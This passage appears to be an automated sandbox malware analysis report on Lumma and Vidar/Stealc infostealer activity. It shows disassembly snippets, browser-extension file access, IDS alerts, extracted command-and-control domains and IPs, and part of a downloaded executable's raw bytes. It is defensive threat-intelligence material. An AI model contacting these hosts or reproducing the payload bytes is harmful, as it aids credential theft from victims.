                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,3_2_00415FD1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,3_2_0040B93F
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,3_2_00415B0B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,3_2_0040CD37
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,3_2_00415142
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr fs:[00000030h]3_2_004014AD
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [ebp-04h], eax3_2_004014AD
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 64567875h10_2_00444040
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [esp+08h], ecx10_2_00401000
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [esp], 00000000h10_2_0041B000
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], dx10_2_004210D0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]10_2_0041508C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [esp+50h], 00000000h10_2_0041508C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], F3285E74h10_2_004480A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]10_2_004300B0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]10_2_00429140
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+00000688h]10_2_0041D1D0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], F8FD61B8h10_2_0041F1D6
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]10_2_0044518B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [esp+18h], 3602043Ah10_2_0042F1B0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx10_2_00427250
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx10_2_00427250
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx esi, byte ptr [edx+eax-01h]10_2_0040C210
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, word ptr [esp+eax*4+000000ACh]10_2_0040C210
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [esp+34h], edx10_2_004012F2
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [edx], ax10_2_0042A280
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]10_2_00414294
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]10_2_0042D295
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+24h]10_2_0042D295
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+20h]10_2_00416319
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al10_2_00433335
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al10_2_00433335
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then dec ebx10_2_0043F3F0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ecx, word ptr [edi]10_2_0042A3A8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+14h]10_2_0042A3A8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], dx10_2_004214D3
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]10_2_0042D4D4
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+24h]10_2_0042D4D4
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], D518DBA1h10_2_0043F4E0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], D1A85EEEh10_2_0043F4E0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], dx10_2_004214EA
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]10_2_00416574
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+24h]10_2_0042C510
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al10_2_00431670
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al10_2_00431670
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al10_2_00431670
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al10_2_00431670
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al10_2_00431670
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al10_2_00431670
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al10_2_00431670
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+000000D0h]10_2_0041D672
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 7789B0CBh10_2_00447630
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp al, 2Eh10_2_0042C6E1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]10_2_0042C6E1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, eax10_2_0040A680
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebp, eax10_2_0040A680
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx eax, word ptr [esi+ecx]10_2_004416A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+000000D0h]10_2_0041D733
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]10_2_00416866
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+68h]10_2_00447820
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]10_2_0042B830
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then xor eax, eax10_2_0042B830
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax10_2_0042A8A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-000000C0h]10_2_0040F917
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+08h]10_2_00412920
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+00000080h]10_2_00412920
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al10_2_00412920
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp dword ptr [00451A70h]10_2_0042E927
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebx, byte ptr [edx]10_2_0043B9F0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+24h]10_2_0042DA0A
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh10_2_00449A10
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp byte ptr [ebp+ebx+00h], 00000000h10_2_0042DB4B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]10_2_00404B50
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 62429966h10_2_00443B60
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp dword ptr [0045042Ch]10_2_0041FB73
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]10_2_00446BE5
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov esi, ebx10_2_00448BE0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al10_2_00433BFE
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al10_2_00433BFE
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh10_2_00449BA0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+54h]10_2_0041FBB1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h10_2_00420C4C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]10_2_00446C5A
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esi+ebx]10_2_00405C00
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]10_2_0040FC00
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h10_2_00444C90
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 69F07BF2h10_2_00427D03
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [ecx+edx+02h], 0000h10_2_00449D20
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 9ECF05EBh10_2_00449D20
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp eax, C0000004h10_2_0041DDFF
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]10_2_00443DA0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]10_2_0042EE40
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax10_2_00415E11
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx eax, byte ptr [ebx+edx-06h]10_2_00406E30
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx esi, byte ptr [edx+ebp]10_2_00406E30
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov esi, ebx10_2_00448F50
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]10_2_0040DFC0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+10h]10_2_0040DFC0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h10_2_00426FF0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al10_2_00433F92
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al10_2_00433F92

                          Networking

                          barindex
                          Suricata IDS alerts for network traffic
                          Source: Network trafficSuricata IDS: 2056401 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (mysterisop .site in TLS SNI) : 192.168.2.6:49754 -> 104.21.21.3:443
                          Source: Network trafficSuricata IDS: 2056408 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (soldiefieop .site) : 192.168.2.6:53042 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2056395 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (absorptioniw .site in TLS SNI) : 192.168.2.6:49755 -> 104.21.17.174:443
                          Source: Network trafficSuricata IDS: 2056409 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (soldiefieop .site in TLS SNI) : 192.168.2.6:49748 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2056406 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (snarlypagowo .site) : 192.168.2.6:59023 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2056400 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mysterisop .site) : 192.168.2.6:51096 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2056396 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (chorusarorp .site) : 192.168.2.6:53950 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2056403 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (questionsmw .store in TLS SNI) : 192.168.2.6:49747 -> 172.67.208.141:443
                          Source: Network trafficSuricata IDS: 2056393 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (abnomalrkmu .site in TLS SNI) : 192.168.2.6:49750 -> 172.67.152.190:443
                          Source: Network trafficSuricata IDS: 2056402 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (questionsmw .store) : 192.168.2.6:65507 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2056410 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (treatynreit .site) : 192.168.2.6:65226 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2054495 - Severity 1 - ET MALWARE Vidar Stealer Form Exfil : 192.168.2.6:49751 -> 45.132.206.251:80
                          Source: Network trafficSuricata IDS: 2056392 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (abnomalrkmu .site) : 192.168.2.6:58118 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2056407 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (snarlypagowo .site in TLS SNI) : 192.168.2.6:49753 -> 104.21.18.193:443
                          Source: Network trafficSuricata IDS: 2056394 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (absorptioniw .site) : 192.168.2.6:59978 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2056411 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (treatynreit .site in TLS SNI) : 192.168.2.6:49752 -> 104.21.84.18:443
                          Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.6:49724 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 49.12.197.9:443 -> 192.168.2.6:49724
                          Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 49.12.197.9:443 -> 192.168.2.6:49725
                          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49754 -> 104.21.21.3:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49754 -> 104.21.21.3:443
                          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49747 -> 172.67.208.141:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49747 -> 172.67.208.141:443
                          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49757 -> 104.21.16.12:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49757 -> 104.21.16.12:443
                          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49750 -> 172.67.152.190:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49750 -> 172.67.152.190:443
                          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49748 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49748 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49753 -> 104.21.18.193:443
                          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49752 -> 104.21.84.18:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49752 -> 104.21.84.18:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49753 -> 104.21.18.193:443
                          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49755 -> 104.21.17.174:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49755 -> 104.21.17.174:443
                          C2 URLs / IPs found in malware configuration
                          Source: Malware configuration extractorURLs: soldiefieop.site
                          Source: Malware configuration extractorURLs: chorusarorp.site
                          Source: Malware configuration extractorURLs: abnomalrkmu.site
                          Source: Malware configuration extractorURLs: mysterisop.site
                          Source: Malware configuration extractorURLs: snarlypagowo.site
                          Source: Malware configuration extractorURLs: questionsmw.stor
                          Source: Malware configuration extractorURLs: absorptioniw.site
                          Source: Malware configuration extractorURLs: treatynreit.site
                          Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199780418869
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 03 Oct 2024 07:16:43 GMTContent-Type: application/octet-streamContent-Length: 391072Last-Modified: Thu, 03 Oct 2024 03:47:30 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66fe13d2-5f7a0"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0c 11 fe 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 a0 05 00 00 06 00 00 00 00 00 00 4e bf 05 00 00 20 00 00 00 c0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 06 00 00 02 00 00 d6 8c 06 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f8 be 05 00 53 00 00 00 00 c0 05 00 42 02 00 00 00 00 00 00 00 00 00 00 78 d1 05 00 28 26 00 00 00 e0 05 00 0c 00 00 00 c0 bd 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 9f 05 00 00 20 00 00 00 a0 05 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 42 02 00 00 00 c0 05 00 00 04 00 00 00 a2 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 05 00 00 02 00 00 00 a6 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 bf 05 00 00 00 00 00 48 00 00 00 02 00 05 00 50 ab 05 00 70 12 00 00 03 00 02 00 11 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 dc 22 06 b4 85 c7 d3 f7 e4 f2 e5 81 5e 6e a5 64 bf 87 bf 78 3a 38 22 68 af d3 3e 0c 59 ab 1a 90 eb 10 36 e2 16 89 f7 95 ce d3 6e 69 f1 b9 55 b7 85 74 9a e2 97 e8 5d 4f 02 a7 86 fd 6d 6f 27 ea 27 bc 59 c1 71 4d 15 7a 42 91 6a b0 30 74 c2 04 12 c7 3a 87 4a cb 79 33 52 8b c7 8f 05 33 d0 e4 73 ce 10 83 c8 dd 1f f7 03 d0 b0 a1 3a 0c e7 5c 6e 6b 9a 53 8e 4e 78 04 9c 87 f4 e5 71 ba 3d c4 5f f7 82 f9 74 b4 93 c8 bb 06 30 e8 bc b3 2c af bf ed 68 70 4f a1 b8 ae 80 87 7e e0 fd 33 60 14 d1 8c 0e e7 10 16 01 62 df 75 1c 55 70 7b 5b e5 ab 22 be ec 28 2e a6 7e b4 40 4b 4b d2 24 68 c8 0f 82 43 ca 62 65 01 64 95 b1 eb a5 67 f0 de f2 7c 3b 3b 82 fe 5a 56 25 57 b9 bc 4a 07 7b 52 cb 93 46 62 c2 8f 05 e8 d1 a7 a0 65 66 bf 80 53 3d 19 fe 86 04 0a ca fe 9e 03 ca 00 d9 58 87 d2 8b 7e 5b 65 e8 00 d1 a5 d9 42 20 5b 67 39 25 2f b6 40 67 96 2b f1 1b 49 87 f2 5a ee 68 ab 32 41 8b 53 f6 32 1a 43 1d d2 c8 05 c7 d0 ad 8c 17 2
                          Source: global trafficHTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                          Source: Joe Sandbox ViewIP Address: 49.12.197.9 49.12.197.9
                          Source: Joe Sandbox ViewIP Address: 104.21.84.18 104.21.84.18
                          Source: Joe Sandbox ViewIP Address: 104.21.18.193 104.21.18.193
                          Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                          Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                          Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
